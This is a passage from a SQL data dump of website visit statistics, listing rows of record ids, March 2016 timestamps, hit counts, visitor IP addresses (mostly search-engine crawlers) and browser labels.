1457316747,2,0,2,0,'66.249.66.162',''),(15409,1457316953,1,1,0,0,'207.46.13.171','other'),(15410,1457317043,1,0,1,0,'66.249.66.190',''),(15411,1457317194,1,0,1,0,'68.180.229.232',''),(15412,1457317303,1,1,0,0,'52.5.30.56','firefox'),(15413,1457317485,78,78,0,0,'80.91.162.99','other'),(15414,1457317487,1,1,0,0,'51.255.65.61','other'),(15415,1457317527,1,1,0,0,'217.69.133.70','other'),(15416,1457317577,2,0,2,0,'66.249.66.166',''),(15417,1457317597,1,0,1,0,'66.249.66.158',''),(15418,1457317620,1,1,0,0,'217.69.133.232','other'),(15419,1457317903,232,232,0,0,'82.193.127.15','other'),(15420,1457318024,1,1,0,0,'8.29.198.25','other'),(15421,1457318176,2,0,2,0,'68.180.229.232',''),(15422,1457318237,1,0,1,0,'66.249.66.133',''),(15423,1457318294,1,1,0,0,'217.69.143.70','other'),(15424,1457318390,1,0,1,0,'66.249.66.190',''),(15425,1457318398,1,1,0,0,'5.255.253.10','other'),(15426,1457318495,40,40,0,0,'157.55.39.223','other'),(15427,1457318735,41,41,0,0,'40.77.167.27','other'),(15428,1457318759,2,0,2,0,'66.249.66.162',''),(15429,1457318768,46,46,0,0,'207.46.13.171','other'),(15430,1457318817,68,68,0,0,'82.193.127.15','other'),(15431,1457318843,1,1,0,0,'51.255.65.81','other'),(15432,1457319203,2,2,0,0,'217.69.133.215','other'),(15433,1457319340,2,0,2,0,'66.249.66.133',''),(15434,1457319508,1,1,0,0,'217.69.133.225','other'),(15435,1457319797,1,0,1,0,'66.249.66.166',''),(15436,1457319926,1,0,1,0,'68.180.229.232',''),(15437,1457320175,1,1,0,0,'66.249.66.190','other'),(15438,1457320254,1,0,1,0,'66.249.66.158',''),(15439,1457320299,2,1,1,0,'66.249.66.166',''),(15440,1457320503,1,1,0,0,'40.77.167.27','other'),(15441,1457320853,1,0,1,0,'66.249.66.162',''),(15442,1457320888,1,0,1,0,'68.180.229.232',''),(15443,1457320999,1,1,0,0,'217.69.133.2','other'),(15444,1457321001,1,1,0,0,'217.69.133.194','other'),(15445,1457321078,1,1,0,0,'217.69.143.60','other'),(15446,1457321085,1,1,0,0,'66.249.66.133','other'),(15447,1457321093,1,1,0,0,'217.69.133.217','other'),(15448,1457321496,1,1,0,0,'217.69.143.63','other'),(15449,1457322096,1,1,0,0,'207.46.13.171','other'),(15450,1457322309,1,1,0,0,'217.69.133.230','other'),(15451,1457322310,1,1,0,0,'217.69.133.229','other'),(15452,1457322440,1,1,0,0,'217.69.143.61','other'),(15453,1457322643,8,8,0,0,'141.8.183.14','other'),(15454,1457322647,3,3,0,0,'130.193.37.21','other'),(15455,1457322651,13,13,0,0,'178.154.149.11','other'),(15456,1457322655,3,3,0,0,'93.158.152.9','other'),(15457,1457322668,1,1,0,0,'5.255.253.53','other'),(15458,1457322671,1,0,1,0,'68.180.229.232',''),(15459,1457322693,6,6,0,0,'141.8.184.18','other'),(15460,1457322767,1,1,0,0,'51.255.65.87','other'),(15461,1457322775,1,1,0,0,'199.58.86.211','other'),(15462,1457322778,1,1,0,0,'141.8.142.10','other'),(15463,1457323062,1,0,1,0,'66.249.66.162',''),(15464,1457323130,2,1,1,0,'66.249.66.166',''),(15465,1457323164,1,1,0,0,'217.69.133.236','other'),(15467,1457323229,3,0,3,0,'66.249.66.190',''),(15468,1457323423,1,1,0,0,'40.77.167.86','other'),(15469,1457323442,1,1,0,0,'217.69.143.53','other'),(15470,1457323462,1,1,0,0,'217.69.136.205','other'),(15471,1457323616,1,0,1,0,'66.249.66.158',''),(15472,1457323906,1,0,1,0,'68.180.229.232',''),(15473,1457324483,1,1,0,0,'217.69.133.233','other'),(15474,1457324680,1,1,0,0,'178.154.189.204','other'),(15475,1457324731,1,0,1,0,'66.249.66.166',''),(15476,1457324736,1,0,1,0,'66.249.66.162',''),(15477,1457324795,93,93,0,0,'178.151.143.163','other'),(15478,1457324887,1,0,1,0,'68.180.229.232',''),(15479,1457324888,1,1,0,0,'217.69.143.57','other'),(15480,1457324965,2,2,0,0,'66.249.66.166','other'),(15481,1457325060,2,0,2,0,'66.249.66.158',''),(15482,1457325185,1,1,0,0,'217.69.143.66','other'),(15483,1457325187,1,1,0,0,'217.69.143.64','other'),(15484,1457325787,1,0,1,0,'66.249.66.162',''),(15485,1457325898,2,2,0,0,'217.69.133.218','other'),(15486,1457325978,1,1,0,0,'217.69.143.49','other'),(15487,1457325993,1,1,0,0,'66.249.92.99','other'),(15488,1457326352,1,1,0,0,'217.69.133.240','other'),(15489,1457326487,1,1,0,0,'141.0.14.180','other'),(15490,1457326827,4,0,4,0,'66.249.66.158',''),(15491,1457326850,3,0,3,0,'66.249.66.162',''),(15492,1457327276,1,1,0,0,'66.249.66.133','other'),(15493,1457327713,1,1,0,0,'207.46.13.171','other'),(15494,1457327799,2,0,2,0,'66.249.66.158',''),(15495,1457327988,3,0,3,0,'66.249.66.162',''),(15496,1457328136,1,1,0,0,'217.69.133.234','other'),(15497,1457328158,1,1,0,0,'66.249.66.166','other'),(15498,1457328364,1,1,0,0,'217.69.143.47','other'),(15499,1457328365,1,1,0,0,'217.69.143.46','other'),(15500,1457328450,1,0,1,0,'66.249.66.190',''),(15501,1457328572,1,1,0,0,'217.69.136.206','other'),(15502,1457328609,1,1,0,0,'217.69.133.238','other'),(15503,1457328654,1,0,1,0,'68.180.229.232',''),(15504,1457328872,1,1,0,0,'8.29.198.25','other'),(15505,1457328896,1,0,1,0,'66.249.66.162',''),(15506,1457329060,1,1,0,0,'217.69.143.57','other'),(15507,1457329353,3,0,3,0,'66.249.66.158',''),(15508,1457329476,1,1,0,0,'66.249.66.129','other'),(15509,1457329702,2,1,1,0,'66.249.66.162',''),(15510,1457329762,1,1,0,0,'217.69.133.228','other'),(15511,1457329828,1,1,0,0,'66.249.66.158','other'),(15512,1457329878,2,1,1,0,'66.249.66.162',''),(15513,1457329990,2,2,0,0,'66.249.66.166','other'),(15514,1457330007,1,1,0,0,'66.249.66.190','other'),(15515,1457330104,2,2,0,0,'66.249.66.162','other'),(15516,1457330284,1,1,0,0,'217.69.133.67','other'),(15517,1457330285,1,1,0,0,'217.69.133.216','other'),(15518,1457330296,1,0,1,0,'68.180.229.232',''),(15519,1457330483,1,1,0,0,'5.255.253.55','other'),(15520,1457330487,2,2,0,0,'5.255.253.79','other'),(15521,1457330492,1,1,0,0,'93.158.152.26','other'),(15522,1457330496,1,1,0,0,'141.8.142.88','other'),(15523,1457330500,1,1,0,0,'141.8.183.14','other'),(15524,1457330504,2,2,0,0,'5.255.253.9','other'),(15525,1457330508,2,2,0,0,'141.8.142.8','other'),(15526,1457330512,1,1,0,0,'130.193.51.43','other'),(15527,1457330517,2,2,0,0,'5.255.253.30','other'),(15528,1457330521,1,1,0,0,'130.193.51.91','other'),(15529,1457330690,4,4,0,0,'130.193.37.21','other'),(15530,1457330695,2,2,0,0,'130.193.51.81','other'),(15531,1457330702,2,2,0,0,'5.255.253.10','other'),(15532,1457330715,3,3,0,0,'130.193.51.102','other'),(15533,1457330719,2,2,0,0,'178.154.149.11','other'),(15534,1457330723,1,1,0,0,'141.8.142.10','other'),(15535,1457330728,2,2,0,0,'130.193.37.27','other'),(15536,1457330732,1,1,0,0,'5.255.253.100','other'),(15537,1457330749,1,1,0,0,'130.193.51.7','other'),(15538,1457330766,1,1,0,0,'5.255.253.110','other'),(15539,1457330778,1,1,0,0,'141.8.184.18','other'),(15540,1457331548,1,1,0,0,'217.69.133.222','other'),(15541,1457331773,1,1,0,0,'66.249.66.162','other'),(15542,1457332152,3,2,1,0,'66.249.66.158',''),(15543,1457332233,1,1,0,0,'217.69.136.205','other'),(15545,1457332285,2,0,2,0,'66.249.66.133',''),(15546,1457332335,1,1,0,0,'91.196.178.169','opera'),(15547,1457332859,2,1,1,0,'66.249.66.166',''),(15548,1457332960,1,1,0,0,'66.249.66.158','other'),(15549,1457332973,1,1,0,0,'40.77.167.86','other'),(15550,1457333264,2,2,0,0,'66.249.66.166','other'),(15551,1457333436,1,1,0,0,'217.69.143.61','other'),(15552,1457333466,2,2,0,0,'66.249.66.162','other'),(15553,1457333535,1,1,0,0,'217.69.133.240','other'),(15554,1457333950,1,0,1,0,'66.249.66.133',''),(15555,1457334007,3,0,3,0,'68.180.229.232',''),(15556,1457334044,1,1,0,0,'66.249.93.86','other'),(15557,1457334563,1,1,0,0,'66.249.93.94','firefox'),(15558,1457334591,1,1,0,0,'62.212.73.211','other'),(15559,1457334679,3,2,1,0,'66.249.66.166',''),(15560,1457334808,1,1,0,0,'141.8.183.14','other'),(15561,1457334812,1,1,0,0,'141.8.142.41','other'),(15562,1457334816,1,1,0,0,'141.8.132.2','other'),(15563,1457334932,1,1,0,0,'66.249.66.129','other'),(15564,1457334952,3,0,3,0,'66.249.66.158',''),(15565,1457335077,2,2,0,0,'217.69.143.69','other'),(15566,1457335166,1,0,1,0,'68.180.229.232',''),(15567,1457335512,1,1,0,0,'40.77.167.27','other'),(15568,1457335627,1,1,0,0,'178.154.189.204','other'),(15569,1457335631,1,1,0,0,'37.9.122.203','other'),(15570,1457335635,1,1,0,0,'37.9.122.201','other'),(15571,1457335638,1,1,0,0,'37.9.122.202','other'),(15572,1457335757,1,1,0,0,'217.69.143.57','other'),(15573,1457335934,1,1,0,0,'217.69.133.220','other'),(15574,1457336069,1,1,0,0,'66.249.66.158','other'),(15575,1457336527,2,2,0,0,'5.255.253.55','other'),(15576,1457336531,2,2,0,0,'130.193.37.27','other'),(15577,1457336534,3,3,0,0,'5.255.253.53','other'),(15579,1457336535,2,2,0,0,'5.255.253.100','other'),(15580,1457336537,2,2,0,0,'130.193.51.45','other'),(15583,1457336538,2,2,0,0,'178.154.149.11','other'),(15584,1457336539,2,2,0,0,'141.8.184.18','other'),(15585,1457336540,1,1,0,0,'141.8.183.14','other'),(15586,1457336544,1,1,0,0,'141.8.142.8','other'),(15587,1457336545,1,1,0,0,'178.154.189.6','other'),(15588,1457336546,1,1,0,0,'5.255.253.51','other'),(15590,1457336547,1,1,0,0,'141.8.132.109','other'),(15591,1457336548,1,1,0,0,'141.8.184.31','other'),(15592,1457336549,1,1,0,0,'141.8.142.60','other'),(15594,1457336551,1,1,0,0,'130.193.50.22','other'),(15596,1457336552,1,1,0,0,'5.255.253.17','other'),(15597,1457336890,1,1,0,0,'66.249.92.99','other'),(15598,1457336931,1,0,1,0,'66.249.66.129',''),(15599,1457337004,2,2,0,0,'66.249.66.166','other'),(15600,1457337304,1,0,1,0,'66.249.66.162',''),(15601,1457337397,1,0,1,0,'68.180.229.232',''),(15602,1457337480,1,1,0,0,'51.255.65.18','other'),(15603,1457338148,1,1,0,0,'217.69.133.68','other'),(15604,1457338149,1,1,0,0,'217.69.133.222','other'),(15605,1457338150,1,1,0,0,'217.69.133.231','other'),(15606,1457338296,1,1,0,0,'217.69.136.206','other'),(15607,1457338432,1,1,0,0,'5.255.253.89','other'),(15608,1457338433,2,2,0,0,'141.8.132.48','other'),(15610,1457338434,2,2,0,0,'130.193.51.45','other'),(15611,1457338435,2,2,0,0,'130.193.51.43','other'),(15612,1457338436,1,1,0,0,'5.255.253.10','other'),(15614,1457338438,1,1,0,0,'141.8.132.97','other'),(15616,1457338439,1,1,0,0,'5.255.253.30','other'),(15617,1457338440,1,1,0,0,'178.154.189.6','other'),(15618,1457338441,1,1,0,0,'141.8.142.55','other'),(15620,1457338443,1,1,0,0,'141.8.184.6','other'),(15622,1457338444,1,1,0,0,'178.154.189.12','other'),(15623,1457338445,1,1,0,0,'93.158.152.65','other'),(15624,1457338447,2,2,0,0,'130.193.51.55','other'),(15625,1457338448,1,1,0,0,'141.8.132.66','other'),(15627,1457338450,1,1,0,0,'141.8.142.82','other'),(15628,1457338451,1,1,0,0,'130.193.51.50','other'),(15630,1457338452,1,1,0,0,'130.193.37.21','other'),(15631,1457338497,1,0,1,0,'66.249.66.133',''),(15632,1457338596,1,1,0,0,'66.249.66.190','other'),(15633,1457338621,2,1,1,0,'66.249.66.158',''),(15634,1457338893,1,1,0,0,'207.46.13.171','other'),(15635,1457339400,1,1,0,0,'40.77.167.86','other'),(15636,1457339575,1,1,0,0,'217.69.136.206','other'),(15637,1457339717,1,1,0,0,'8.29.198.25','other'),(15638,1457339824,3,0,3,0,'66.249.66.158',''),(15639,1457339888,1,0,1,0,'66.249.66.190',''),(15640,1457339930,1,1,0,0,'51.255.65.36','other'),(15641,1457340117,1,1,0,0,'217.69.143.53','other'),(15642,1457340180,3,0,3,0,'66.249.66.162',''),(15643,1457340199,1,0,1,0,'68.180.229.232',''),(15644,1457340463,1,1,0,0,'78.111.185.84','chrome'),(15645,1457340489,1,1,0,0,'64.233.172.130','chrome'),(15646,1457340692,1,1,0,0,'217.69.143.62','other'),(15647,1457340754,4,4,0,0,'141.8.183.14','other'),(15648,1457340755,4,4,0,0,'178.154.149.11','other'),(15649,1457340756,3,3,0,0,'5.255.253.53','other'),(15650,1457340757,7,7,0,0,'93.158.152.9','other'),(15651,1457340758,7,7,0,0,'141.8.184.18','other'),(15652,1457340809,1,1,0,0,'178.154.189.204','other'),(15653,1457341217,1,0,1,0,'66.249.66.129',''),(15654,1457341239,1,1,0,0,'66.249.93.94','other'),(15655,1457341494,2,0,2,0,'66.249.66.158',''),(15656,1457341822,1,1,0,0,'217.69.133.221','other'),(15657,1457342058,2,2,0,0,'66.249.66.166','other'),(15658,1457342324,2,2,0,0,'66.249.66.162','other'),(15659,1457342787,1,1,0,0,'194.44.45.187','firefox'),(15660,1457342858,1,1,0,0,'178.95.7.59','firefox'),(15661,1457343510,1,0,1,0,'66.249.66.129',''),(15662,1457343702,1,1,0,0,'46.201.240.112','firefox'),(15663,1457343873,3,0,3,0,'66.249.66.158',''),(15664,1457344152,1,1,0,0,'217.69.133.236','other'),(15665,1457344537,1,0,1,0,'68.180.229.232',''),(15666,1457344647,1,1,0,0,'141.8.132.79','other'),(15667,1457344648,1,1,0,0,'178.154.189.6','other'),(15668,1457344649,1,1,0,0,'5.255.253.51','other'),(15669,1457344650,1,1,0,0,'5.255.253.62','other'),(15670,1457344651,2,2,0,0,'141.8.183.14','other'),(15672,1457344652,5,5,0,0,'178.154.149.11','other'),(15673,1457344654,4,4,0,0,'141.8.184.18','other'),(15674,1457344660,1,1,0,0,'130.193.37.21','other'),(15676,1457344662,1,1,0,0,'130.193.51.109','other'),(15678,1457344900,1,1,0,0,'157.55.39.223','other'),(15679,1457344922,1,1,0,0,'66.249.93.94','other'),(15680,1457344979,1,1,0,0,'217.69.133.221','other'),(15681,1457345075,2,0,2,0,'66.249.66.133',''),(15682,1457345093,2,0,2,0,'66.249.66.158',''),(15683,1457345521,70,70,0,0,'82.193.127.15','other'),(15684,1457346093,1,0,1,0,'66.249.66.129',''),(15685,1457346601,3,0,3,0,'66.249.66.162',''),(15686,1457346634,7,7,0,0,'178.154.149.11','other'),(15687,1457346635,1,1,0,0,'141.8.142.55','other'),(15688,1457346636,1,1,0,0,'93.158.152.65','other'),(15689,1457346637,1,1,0,0,'130.193.51.109','other'),(15690,1457346638,1,1,0,0,'130.193.37.27','other'),(15691,1457346639,7,7,0,0,'141.8.184.18','other'),(15692,1457346746,4,4,0,0,'141.8.183.14','other'),(15693,1457346752,3,3,0,0,'93.158.152.9','other'),(15694,1457346785,1,1,0,0,'217.69.143.59','other'),(15695,1457346942,2,0,2,0,'68.180.229.232',''),(15696,1457347114,2,0,2,0,'66.249.66.133',''),(15697,1457347135,1,1,0,0,'78.111.185.84','chrome'),(15698,1457347169,1,1,0,0,'37.52.210.203','chrome'),(15699,1457347295,1,0,1,0,'66.249.66.158',''),(15700,1457347444,1,1,0,0,'141.0.15.251','other'),(15701,1457347702,1,1,0,0,'217.69.133.225','other'),(15702,1457347730,1,1,0,0,'66.249.92.99','other'),(15703,1457347912,1,1,0,0,'51.255.65.81','other'),(15704,1457347952,2,0,2,0,'68.180.229.232',''),(15705,1457348016,3,3,0,0,'141.8.184.18','other'),(15706,1457348017,8,8,0,0,'178.154.149.11','other'),(15707,1457348021,4,4,0,0,'141.8.183.14','other'),(15708,1457348023,2,2,0,0,'93.158.152.9','other'),(15709,1457348317,1,0,1,0,'66.249.66.190',''),(15710,1457348425,1,1,0,0,'217.69.143.48','other'),(15711,1457348681,1,1,0,0,'217.69.143.56','other'),(15712,1457348767,2,0,2,0,'66.249.66.162',''),(15713,1457349435,1,1,0,0,'91.196.178.68','firefox'),(15714,1457349501,1,1,0,0,'178.154.189.204','other'),(15715,1457349787,1,1,0,0,'91.196.178.136','chrome'),(15716,1457349828,2,0,2,0,'66.249.66.162',''),(15717,1457350051,1,1,0,0,'217.69.133.235','other'),(15718,1457350173,2,1,1,0,'66.249.66.166',''),(15719,1457350200,12,12,0,0,'141.8.184.18','other'),(15720,1457350202,8,8,0,0,'5.255.253.53','other'),(15721,1457350203,6,6,0,0,'141.8.183.14','other'),(15722,1457350208,6,6,0,0,'93.158.152.9','other'),(15723,1457350209,3,3,0,0,'130.193.37.21','other'),(15724,1457350215,2,2,0,0,'178.154.149.11','other'),(15725,1457350545,1,1,0,0,'8.29.198.26','other'),(15726,1457350587,1,1,0,0,'207.46.13.171','other'),(15727,1457350623,1,0,1,0,'68.180.229.232',''),(15728,1457351779,1,1,0,0,'78.111.185.84','chrome'),(15729,1457351808,2,2,0,0,'82.145.220.103','chrome'),(15730,1457352004,1,1,0,0,'37.187.95.101','other'),(15731,1457352031,1,1,0,0,'37.187.94.178','other'),(15732,1457352038,1,1,0,0,'66.249.93.90','other'),(15733,1457353219,1,1,0,0,'51.255.65.65','other'),(15734,1457353235,1,1,0,0,'37.187.95.107','other'),(15735,1457353405,3,0,3,0,'66.249.66.158',''),(15736,1457353878,1,0,1,0,'66.249.66.133',''),(15737,1457353882,2,0,2,0,'66.249.66.166',''),(15738,1457353889,2,2,0,0,'40.77.167.86','other'),(15739,1457353906,1,0,1,0,'66.249.66.162',''),(15740,1457354200,2,2,0,0,'130.193.50.31','other'),(15741,1457354379,1,1,0,0,'178.154.149.9','other'),(15742,1457354383,3,3,0,0,'141.8.132.99','other'),(15743,1457354392,2,2,0,0,'5.255.253.62','other'),(15744,1457354396,1,1,0,0,'141.8.132.109','other'),(15745,1457354402,1,1,0,0,'141.8.132.44','other'),(15746,1457354408,1,1,0,0,'93.158.152.65','other'),(15747,1457354412,1,1,0,0,'217.69.143.62','other'),(15748,1457354413,1,1,0,0,'130.193.50.22','other'),(15749,1457354416,1,1,0,0,'5.255.253.103','other'),(15750,1457354421,1,1,0,0,'141.8.184.31','other'),(15751,1457354434,1,1,0,0,'178.154.149.11','other'),(15752,1457354439,1,1,0,0,'5.255.253.51','other'),(15753,1457354930,1,1,0,0,'217.69.133.216','other'),(15754,1457354996,1,0,1,0,'66.249.66.162',''),(15755,1457355550,1,1,0,0,'217.69.143.58','other'),(15756,1457355664,1,0,1,0,'66.249.66.166',''),(15757,1457355703,1,1,0,0,'66.249.93.86','other'),(15758,1457356303,2,0,2,0,'68.180.229.232',''),(15759,1457356558,2,2,0,0,'141.8.132.97','other'),(15760,1457356567,1,1,0,0,'5.255.253.55','other'),(15761,1457356571,2,2,0,0,'5.255.253.30','other'),(15762,1457356580,2,2,0,0,'141.8.184.11','other'),(15763,1457356584,3,3,0,0,'5.255.253.100','other'),(15764,1457356589,2,2,0,0,'141.8.183.14','other'),(15765,1457356593,2,2,0,0,'141.8.142.41','other'),(15766,1457356597,2,2,0,0,'141.8.184.22','other'),(15767,1457356601,1,1,0,0,'178.154.149.11','other'),(15768,1457356602,1,0,1,0,'66.249.66.162',''),(15769,1457356606,3,3,0,0,'141.8.142.10','other'),(15770,1457356610,1,1,0,0,'141.8.142.8','other'),(15771,1457356623,1,1,0,0,'5.255.253.110','other'),(15772,1457356627,2,2,0,0,'141.8.132.79','other'),(15773,1457356632,1,1,0,0,'130.193.51.85','other'),(15774,1457356636,1,1,0,0,'93.158.152.9','other'),(15775,1457356793,1,1,0,0,'130.193.37.21','other'),(15776,1457356816,2,2,0,0,'93.158.152.26','other'),(15777,1457356824,1,1,0,0,'141.8.132.99','other'),(15778,1457356833,1,1,0,0,'130.193.51.43','other'),(15779,1457356837,1,1,0,0,'5.255.253.10','other'),(15780,1457356854,1,1,0,0,'5.255.253.9','other'),(15781,1457356858,1,1,0,0,'130.193.51.81','other'),(15782,1457356866,1,1,0,0,'217.69.143.60','other'),(15783,1457356867,1,1,0,0,'217.69.143.55','other'),(15784,1457357396,1,1,0,0,'217.69.133.240','other'),(15785,1457357606,1,1,0,0,'46.55.23.55','msie'),(15786,1457357808,2,2,0,0,'217.69.133.217','other'),(15787,1457357897,2,0,2,0,'66.249.66.166',''),(15788,1457357899,1,1,0,0,'66.249.66.133','other'),(15789,1457358109,1,1,0,0,'217.69.143.52','other'),(15790,1457358160,1,1,0,0,'66.249.92.103','other'),(15791,1457358161,1,1,0,0,'217.69.143.45','other'),(15792,1457358310,2,2,0,0,'93.158.152.26','other'),(15793,1457358314,1,1,0,0,'141.8.132.79','other'),(15794,1457358317,1,0,1,0,'66.249.66.162',''),(15795,1457358318,1,1,0,0,'5.255.253.10','other'),(15796,1457358323,1,1,0,0,'141.8.142.41','other'),(15797,1457358327,1,1,0,0,'141.8.132.2','other'),(15798,1457358332,2,0,2,0,'66.249.66.158',''),(15799,1457358335,3,3,0,0,'130.193.37.21','other'),(15800,1457358340,1,1,0,0,'5.255.253.30','other'),(15801,1457358355,1,1,0,0,'130.193.51.81','other'),(15802,1457358363,1,1,0,0,'5.255.253.100','other'),(15803,1457358372,1,1,0,0,'141.8.142.10','other'),(15804,1457358377,1,1,0,0,'5.255.253.9','other'),(15805,1457358382,1,1,0,0,'141.8.132.97','other'),(15806,1457358625,1,0,1,0,'68.180.229.232',''),(15807,1457358935,3,1,2,0,'66.249.66.166',''),(15808,1457358947,2,1,1,0,'66.249.66.162',''),(15809,1457359080,1,1,0,0,'217.69.133.68','other'),(15810,1457359294,1,0,1,0,'66.249.66.190',''),(15811,1457359383,1,1,0,0,'217.69.133.216','other'),(15812,1457359536,1,0,1,0,'66.249.66.129',''),(15813,1457359559,1,0,1,0,'66.249.66.158',''),(15814,1457359566,2,2,0,0,'66.249.66.158','other'),(15815,1457359784,1,1,0,0,'66.249.66.129','other'),(15816,1457359794,2,1,1,0,'66.249.66.162',''),(15817,1457359925,1,1,0,0,'66.249.66.166','other'),(15818,1457359965,1,1,0,0,'5.255.253.53','other'),(15819,1457359969,2,2,0,0,'130.193.51.81','other'),(15820,1457359978,1,1,0,0,'130.193.51.45','other'),(15821,1457359986,1,1,0,0,'130.193.51.85','other'),(15822,1457359990,1,1,0,0,'130.193.51.43','other'),(15823,1457359994,1,1,0,0,'5.255.253.30','other'),(15824,1457359998,1,1,0,0,'5.255.253.100','other'),(15825,1457360003,1,1,0,0,'5.255.253.110','other'),(15826,1457360007,1,1,0,0,'178.154.149.11','other'),(15827,1457360011,1,1,0,0,'5.255.253.9','other'),(15828,1457360015,1,1,0,0,'5.255.253.55','other'),(15829,1457360020,1,1,0,0,'5.255.253.94','other'),(15830,1457360023,1,1,0,0,'141.8.142.10','other'),(15831,1457360027,1,1,0,0,'141.8.132.79','other'),(15832,1457360372,1,1,0,0,'78.111.190.246','chrome'),(15833,1457360458,1,1,0,0,'66.249.93.94','firefox'),(15834,1457360499,1,1,0,0,'94.179.51.109','other'),(15835,1457360521,1,1,0,0,'217.69.143.68','other'),(15836,1457360667,2,2,0,0,'66.249.66.158','other'),(15837,1457360877,1,1,0,0,'91.196.178.36','other'),(15838,1457361385,1,1,0,0,'8.29.198.26','other'),(15839,1457361552,1,1,0,0,'141.8.142.60','other'),(15840,1457361557,1,1,0,0,'130.193.50.31','other'),(15841,1457361575,1,0,1,0,'66.249.66.129',''),(15842,1457361666,4,3,1,0,'66.249.66.158',''),(15843,1457361697,4,4,0,0,'188.163.73.51','other'),(15844,1457361779,3,2,1,0,'66.249.66.133',''),(15845,1457361932,1,1,0,0,'217.69.133.240','other'),(15846,1457362083,1,1,0,0,'217.69.133.227','other'),(15847,1457362131,2,0,2,0,'66.249.66.166',''),(15848,1457362429,1,1,0,0,'217.69.133.221','other'),(15849,1457362520,1,1,0,0,'130.193.51.22','other'),(15850,1457362524,1,1,0,0,'5.255.253.51','other'),(15851,1457362528,1,1,0,0,'93.158.152.65','other'),(15852,1457362536,1,1,0,0,'141.8.184.6','other'),(15853,1457362540,2,2,0,0,'93.158.152.9','other'),(15854,1457362545,1,1,0,0,'5.255.253.103','other'),(15855,1457362549,1,1,0,0,'5.255.253.79','other'),(15856,1457362553,1,1,0,0,'141.8.184.11','other'),(15857,1457362557,1,1,0,0,'5.255.253.30','other'),(15858,1457362565,2,2,0,0,'5.255.253.9','other'),(15859,1457362570,2,2,0,0,'130.193.51.85','other'),(15860,1457362574,2,2,0,0,'141.8.142.10','other'),(15861,1457362582,1,1,0,0,'5.255.253.100','other'),(15862,1457362587,1,1,0,0,'130.193.51.43','other'),(15863,1457362588,1,1,0,0,'66.249.66.158','other'),(15864,1457362590,1,1,0,0,'5.255.253.10','other'),(15865,1457362602,1,1,0,0,'141.8.132.97','other'),(15866,1457362608,2,0,2,0,'66.249.66.162',''),(15867,1457362699,1,1,0,0,'217.69.136.203','other'),(15868,1457362833,1,1,0,0,'66.249.93.94','other'),(15869,1457362863,2,0,2,0,'68.180.229.232',''),(15870,1457363377,1,0,1,0,'66.249.66.133',''),(15871,1457363579,1,1,0,0,'217.69.133.85','other'),(15872,1457363583,1,0,1,0,'66.249.66.162',''),(15873,1457363617,1,1,0,0,'66.249.66.129','other'),(15874,1457363781,2,0,2,0,'66.249.66.158',''),(15875,1457363809,1,1,0,0,'37.187.95.66','other'),(15876,1457363917,1,1,0,0,'141.8.142.10','other'),(15877,1457363921,2,2,0,0,'141.8.184.18','other'),(15878,1457363925,2,2,0,0,'130.193.51.81','other'),(15879,1457363929,1,1,0,0,'141.8.142.8','other'),(15880,1457363933,1,1,0,0,'93.158.152.26','other'),(15881,1457363937,2,2,0,0,'141.8.132.79','other'),(15882,1457363942,1,1,0,0,'130.193.51.45','other'),(15883,1457363946,2,2,0,0,'5.255.253.30','other'),(15884,1457363954,1,1,0,0,'130.193.51.102','other'),(15885,1457363958,1,1,0,0,'141.8.183.14','other'),(15886,1457363971,1,1,0,0,'5.255.253.9','other'),(15887,1457363975,1,1,0,0,'141.8.142.41','other'),(15888,1457363979,1,1,0,0,'141.8.132.2','other'),(15889,1457363987,1,1,0,0,'130.193.51.43','other'),(15890,1457364456,1,1,0,0,'217.69.143.63','other'),(15891,1457364699,1,1,0,0,'171.25.193.132','chrome'),(15892,1457364720,2,0,2,0,'68.180.229.232',''),(15893,1457364798,4,4,0,0,'45.55.129.31','chrome'),(15894,1457364998,1,1,0,0,'46.55.23.55','msie'),(15895,1457365097,1,1,0,0,'51.255.65.66','other'),(15896,1457365253,2,2,0,0,'217.69.133.215','other'),(15897,1457365374,1,1,0,0,'51.255.65.49','other'),(15898,1457365394,1,1,0,0,'51.255.65.43','other'),(15899,1457365439,2,2,0,0,'66.249.66.166','other'),(15900,1457365487,1,1,0,0,'66.249.66.129','other'),(15901,1457365549,1,1,0,0,'217.69.133.68','other'),(15902,1457365560,1,1,0,0,'217.69.133.231','other'),(15903,1457366252,4,4,0,0,'5.255.253.100','other'),(15904,1457366256,1,1,0,0,'5.255.253.103','other'),(15905,1457366260,1,1,0,0,'130.193.51.7','other'),(15906,1457366264,1,1,0,0,'130.193.37.21','other'),(15907,1457366278,1,1,0,0,'141.8.132.48','other'),(15908,1457366281,1,1,0,0,'141.8.142.8','other'),(15909,1457366285,1,1,0,0,'93.158.152.65','other'),(15910,1457366289,1,1,0,0,'141.8.132.2','other'),(15911,1457366293,1,1,0,0,'141.8.132.74','other'),(15912,1457366298,1,1,0,0,'5.255.253.89','other'),(15913,1457366302,1,1,0,0,'141.8.142.55','other'),(15914,1457366310,1,1,0,0,'130.193.51.102','other'),(15915,1457366314,1,1,0,0,'141.8.183.14','other'),(15916,1457366319,1,1,0,0,'5.255.253.55','other'),(15917,1457366323,1,1,0,0,'5.255.253.62','other'),(15918,1457366327,1,1,0,0,'141.8.132.79','other'),(15919,1457366335,1,1,0,0,'130.193.51.81','other'),(15920,1457366340,1,1,0,0,'141.8.132.76','other'),(15921,1457366363,1,1,0,0,'157.55.39.223','other'),(15922,1457366460,1,0,1,0,'66.249.66.190',''),(15923,1457366599,3,2,1,0,'66.249.66.158',''),(15924,1457366784,1,1,0,0,'207.46.13.43','other'),(15925,1457367152,1,1,0,0,'66.249.66.129','other'),(15926,1457367424,1,1,0,0,'217.69.133.236','other'),(15927,1457367614,3,0,3,0,'66.249.66.158',''),(15928,1457367768,1,1,0,0,'37.9.122.203','other'),(15929,1457367848,1,0,1,0,'66.249.66.166',''),(15930,1457367858,2,0,2,0,'66.249.66.162',''),(15931,1457368038,2,1,1,0,'66.249.66.162',''),(15932,1457368086,2,1,1,0,'66.249.66.166',''),(15933,1457368198,2,2,0,0,'130.193.51.109','other'),(15935,1457368200,2,2,0,0,'141.8.132.2','other'),(15937,1457368201,2,2,0,0,'178.154.189.6','other'),(15938,1457368202,2,2,0,0,'141.8.142.55','other'),(15940,1457368203,2,2,0,0,'178.154.189.12','other'),(15941,1457368204,1,1,0,0,'5.255.253.89','other'),(15942,1457368205,1,1,0,0,'141.8.132.48','other'),(15944,1457368206,1,1,0,0,'141.8.183.14','other'),(15945,1457368207,1,1,0,0,'5.255.253.55','other'),(15946,1457368210,1,1,0,0,'141.8.132.74','other'),(15947,1457368211,1,1,0,0,'141.8.132.66','other'),(15948,1457368212,1,1,0,0,'130.193.50.31','other'),(15949,1457368279,1,1,0,0,'157.55.39.